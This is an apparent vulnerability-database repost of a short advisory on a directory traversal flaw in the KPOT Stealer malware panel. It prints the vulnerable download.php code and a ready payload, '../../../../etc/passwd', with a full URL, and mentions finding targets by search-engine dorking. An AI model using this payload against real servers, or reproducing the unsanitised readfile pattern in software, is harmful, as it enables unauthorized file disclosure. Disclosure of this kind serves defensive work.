Lucene search
K

KPOT Stealer CMS 2.0 Directory Traversal

🗓️ 18 Sep 2023 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 328 Views

KPOT Stealer CMS 2.0 Directory Traversal vulnerability on Windows 10 with Mozilla Firefox 63.0.3 (32-bit

Code
`====================================================================================================================================  
| # Title : KPOT Stealer CMS v2.0 Directory Traversal Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |  
| # Vendor : https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/kpot2/KPOT.md |   
====================================================================================================================================  
  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine   
  
[+] onfected file: download.php  
  
<?php  
if (isset($_GET['file']))  
{  
$file = $_GET['file'];  
header('Content-Disposition: attachment; filename="'.basename($file).'"');  
header('Content-Length: ' . filesize($file));  
readfile($file);  
}  
?>  
  
[+] use payload : download.php?file=../../../../../../../../../etc/passwd  
  
[+] http://127.0.0.1/KPOT/download.php?file=../../../../../../../../../etc/passwd  
  
Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |  
=======================================================================================================================================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Sep 2023 00:00Current
7.1High risk
Vulners AI Score7.1
328